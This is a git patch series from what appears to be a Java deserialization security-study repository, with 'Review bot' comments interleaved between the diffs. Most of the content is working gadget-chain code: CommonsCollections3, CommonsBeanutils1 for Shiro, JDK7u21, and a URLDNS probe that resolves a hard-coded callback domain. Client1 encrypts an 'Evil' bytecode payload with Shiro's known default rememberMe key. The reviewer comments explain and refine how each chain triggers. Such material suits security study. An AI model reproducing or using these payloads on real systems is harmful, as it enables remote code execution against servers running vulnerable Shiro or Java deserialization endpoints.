diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index b3f1918..521ce73 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -3,6 +3,8 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -30,10 +32,10 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr } public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java index aecb359..487e451 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java 
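Review bot: The first hunk adds `import javassist.CtClass;` to CommonsCollections3, but the inlined `ClassPool.getDefault().get(...).toBytecode()` call in the second hunk never names `CtClass`, so the import is dead and `javassist.ClassPool` is the only javassist type the file needs. Drop the `CtClass` line here (the same unused import is added to CommonsCollections3For4 in the next file). `main` continues past the end of this hunk.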
@@ -3,6 +3,8 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; @@ -18,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -30,10 +31,10 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr } public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java new file mode 100644 index 0000000..4f59ed8 --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java 
@@ -0,0 +1,20 @@
+package com.govuln.shiroattack;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.util.ByteSource;
+
+public class Client1 {
+ public static void main(String []args) throws Exception {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName());
+ byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
+
+ AesCipherService aes = new AesCipherService();
+ byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+
+ ByteSource ciphertext = aes.encrypt(payloads, key);
+ System.out.printf(ciphertext.toString());
+ }
+}
diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java new file mode 100644
index 0000000..d7fcdd4
--- /dev/null
+++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java
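Review bot: `System.out.printf(ciphertext.toString())` passes the encoded ciphertext as the format string; it only works because Base64 output (which I believe `ByteSource.toString()` yields for Shiro's `SimpleByteSource`) never contains `%`, and it prints no trailing newline. Use `System.out.println(ciphertext.toString());` so the data is never interpreted as a format. A comment on the `key` line would also help: `// Shiro's well-known default rememberMe key (Base64); replace for a non-default target.`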
@@ -0,0 +1,43 @@
+package com.govuln.shiroattack;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+public class CommonsBeanutils1Shiro {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public byte[] getPayload(byte[] clazzBytes) throws Exception {
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+ final PriorityQueue queue = new PriorityQueue(2, comparator);
+ // stub data for replacement later
+ queue.add("1");
+ queue.add("1");
+
+ setFieldValue(comparator, "property", "outputProperties");
+ setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+ // ==================
+ // 生成序列化字符串
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(queue);
+ oos.close();
+
+ return barr.toByteArray();
+ }
+} From 372fb2a747fe3952354ff37c9b1badfc94956473 Mon Sep 17 00:00:00 2001 From: phith0n Date: Mon, 19 Apr 2021 20:55:03 +0800 Subject: [PATCH 25/35] add CommonsBeanutils1Shiro --- README.md | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 4550056..dbfc6f7 100644
--- a/README.md
+++ b/README.md
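Review bot: The one design decision in `getPayload` — `new BeanComparator(null, String.CASE_INSENSITIVE_ORDER)` — is undocumented, and a reader comparing it with the general-module `CommonsBeanutils1` will not know why the constructor differs. I would put above it: `// Use a JDK comparator rather than BeanComparator's default (which, as far as I recall, comes from commons-collections) so the stream references only classes Shiro already ships; the "1" stubs are Strings so this comparator accepts them during add().` The `// 生成序列化字符串` line should be English like the rest of the file, e.g. `// serialize the queue`, and `oos` would be safer in try-with-resources so the stream is closed even if `writeObject` throws.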
@@ -21,6 +21,7 @@ - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) +- [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) ## Demo代码 @@ -47,3 +48,4 @@ Shiro反序列化: - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 +- 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) From a506fe4c443fb76451ecd03fc403126ac06b1259 Mon Sep 17 00:00:00 2001 From: phith0n Date: Thu, 3 Jun 2021 21:34:14 +0800 Subject: [PATCH 26/35] URLDNS --- .../com/govuln/deserialization/URLDNS.java | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/URLDNS.java diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/general/src/main/java/com/govuln/deserialization/URLDNS.java new file mode 100644 index 0000000..296614c --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/URLDNS.java 
@@ -0,0 +1,52 @@
+package com.govuln.deserialization;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.net.InetAddress;
+import java.net.URL;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
+import java.util.HashMap;
+
+public class URLDNS {
+
+ static class SilentURLStreamHandler extends URLStreamHandler {
+
+ protected URLConnection openConnection(URL u) throws IOException {
+ return null;
+ }
+
+ protected synchronized InetAddress getHostAddress(URL u) {
+ return null;
+ }
+ }
+
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String []args) throws Exception {
+ String url = "http://dns.675ba661.y7z.xyz";
+
+ //Avoid DNS resolution during payload creation
+ //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
+ URLStreamHandler handler = new SilentURLStreamHandler();
+
+ HashMap ht = new HashMap(); // HashMap that will contain the URL
+ URL u = new URL(null, url, handler); // URL to use as the Key
+ ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
+
+ setFieldValue(u, "hashCode", -1);
+
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(ht);
+ oos.close();
+
+ System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object)ois.readObject();
+ }
+} From 12d64473659597c5d5b75b290faebec2e8a87661 Mon Sep 17 00:00:00 2001
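Review bot: `setFieldValue(u, "hashCode", -1)` is the step that makes the gadget fire and it is the only one without a comment, while the surrounding comments explain the silent handler in detail. `ht.put(u, url)` already called `u.hashCode()` through `SilentURLStreamHandler` and cached the result in `URL.hashCode`; unless that cache is reset, the receiving `HashMap.readObject` never recomputes the hash and never reaches the real handler's host lookup. I would add: `// put() cached the hash computed by the silent handler; reset it so HashMap.readObject re-derives it with the default handler, which resolves the host.` It is also worth stating above the final `readObject()` that the local test performs that DNS lookup from the generating machine, since the restored URL no longer carries the silent handler.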
From: phith0n Date: Wed, 23 Jun 2021 12:03:30 +0800 Subject: [PATCH 27/35] add JDK7u21 --- general/general.iml | 19 ++++++ general/pom.xml | 15 +++-- .../com/govuln/bytes/HelloDefineClass.java | 5 +- .../com/govuln/bytes/HelloTemplatesImpl.java | 4 +- .../deserialization/CommonsCollections3.java | 1 - .../CommonsCollectionsIntro2.java | 4 +- .../CommonsCollectionsIntro3.java | 4 +- .../com/govuln/deserialization/JDK7u21.java | 66 +++++++++++++++++++ .../TemplatesImplDeserialization.java | 4 +- 9 files changed, 107 insertions(+), 15 deletions(-) create mode 100644 general/general.iml create mode 100644 general/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/general.iml b/general/general.iml new file mode 100644 index 0000000..7ee5fc5 --- /dev/null +++ b/general/general.iml @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index 8ad9f54..9153046 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 1.7 + 1.7 @@ -42,6 +42,13 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + @@ -94,8 +101,8 @@ org.apache.maven.plugins maven-compiler-plugin - 8 - 8 + 7 + 7 diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 9ae4bb9..93c46ac 100644 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,7 +1,8 @@ package com.govuln.bytes; +import org.apache.commons.codec.binary.Base64; + import java.lang.reflect.Method; -import java.util.Base64; public class HelloDefineClass { public static void main(String[] args) throws Exception { 
@@ -9,7 +10,7 @@ public static void main(String[] args) throws Exception { defineClass.setAccessible(true); // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); hello.newInstance(); } diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 598788e..c8fae6f 100644 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -2,9 +2,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import java.lang.reflect.Field; -import java.util.Base64; public class HelloTemplatesImpl { public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { @@ -15,7 +15,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java 
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
@@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java 
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..e3fb4d0 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java 
@@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + + setFieldValue(tempHandler, "type", Templates.class); + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + LinkedHashSet set = new LinkedHashSet(); // maintain order + set.add(templates); + set.add(proxy); + + setFieldValue(templates, "_auxClasses", null); + setFieldValue(templates, "_class", null); + + map.put(zeroHashCodeStr, templates); // swap in real object + + ByteArrayOutputStream barr 
= new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
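Review bot: `String zeroHashCodeStr = "f5a5a608";` carries the whole trick of this gadget and nothing explains it; `"f5a5a608".hashCode()` is 0, so the per-member term that `AnnotationInvocationHandler.hashCodeImpl` computes (`127 * name.hashCode() ^ value.hashCode()`, as far as I recall) collapses to `templates.hashCode()` and the proxy lands in the same `HashMap` bucket as `templates` on deserialization. I would put that in a comment on the line: `// "f5a5a608".hashCode() == 0, so the proxy's hashCode equals templates.hashCode() and HashMap.readObject must compare them via equals()`. The `LinkedHashSet` comment `// maintain order` would likewise benefit from saying which order and why: `templates` must precede `proxy` in the stream so that `put(proxy)` calls `proxy.equals(templates)` and dispatches into the handler rather than the reverse.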
@@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); From 43f431135fd7330cfd61d277ed02d6eb2218d922 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 05:26:50 +0800 Subject: [PATCH 28/35] my own JDK7u21 --- .../java/com/govuln/deserialization/JDK7u21.java | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index e3fb4d0..eb037cc 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -15,6 +15,7 @@ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashSet; import java.util.Map; 
@@ -29,24 +30,25 @@ public static void main(String[] args) throws Exception { String zeroHashCodeStr = "f5a5a608"; + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 HashMap map = new HashMap(); map.put(zeroHashCodeStr, "foo"); + // 实例化AnnotationInvocationHandler类 Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); handlerConstructor.setAccessible(true); - InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); - setFieldValue(tempHandler, "type", Templates.class); + // 为tempHandler创造一层代理 Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); - LinkedHashSet set = new LinkedHashSet(); // maintain order + // 实例化HashSet,并将两个对象放进去 + HashSet set = new HashSet(); // maintain order set.add(templates); set.add(proxy); - setFieldValue(templates, "_auxClasses", null); - setFieldValue(templates, "_class", null); - - map.put(zeroHashCodeStr, templates); // swap in real object + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); From b9847809da5a39456cb229a12688ee5e2efd13f5 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Wed, 7 Jul 2021 21:54:39 +0800 Subject: [PATCH 29/35] =?UTF-8?q?=E4=BD=BF=E7=94=A8LinkedHashSet=E8=A7=A3?= =?UTF-8?q?=E5=86=B3=E6=9C=89=E6=97=B6=E5=80=99=E6=97=A0=E6=B3=95=E8=A7=A6?= =?UTF-8?q?=E5=8F=91=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E9=97=AE?= =?UTF-8?q?=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 原因是templates与proxy是有顺序的,如果用HashSet将丢掉顺序,这样有概率无法触发 --- general/pom.xml | 14 ++------------ .../java/com/govuln/deserialization/JDK7u21.java | 2 +- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/general/pom.xml b/general/pom.xml index 9153046..1d58119 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.7 - 1.7 + 1.6 + 1.6 @@ -96,15 +96,5 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 7 - 7 - - - diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index eb037cc..a7824f5 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -43,7 +43,7 @@ public static void main(String[] args) throws Exception { Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); // 实例化HashSet,并将两个对象放进去 - HashSet set = new HashSet(); // maintain order + HashSet set = new LinkedHashSet(); set.add(templates); set.add(proxy); From 635e63d641d508ba4e63313336b8750298c41004 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 23:42:18 +0800 Subject: [PATCH 30/35] update manual --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index dbfc6f7..cc8c809 100644 --- a/README.md +++ b/README.md 
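Review bot: `HashSet set = new LinkedHashSet();` now has no comment explaining why an ordered set is required, although the commit message gives the reason (templates must precede the proxy in the stream, otherwise the chain fires only by chance); without it the next reader sees a `LinkedHashSet` assigned to a `HashSet`-typed variable and may "simplify" it back. Suggested comment above the line: `// LinkedHashSet on purpose: templates must be written before proxy so that, on readObject, proxy is the element compared against templates (as I read the chain); HashSet does not guarantee that order and the trigger then becomes probabilistic`. Declaring the variable as `Set<Object>` instead of the raw `HashSet` would also remove the mismatch between declared and actual type. The enclosing `main` starts and ends outside the hunk.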
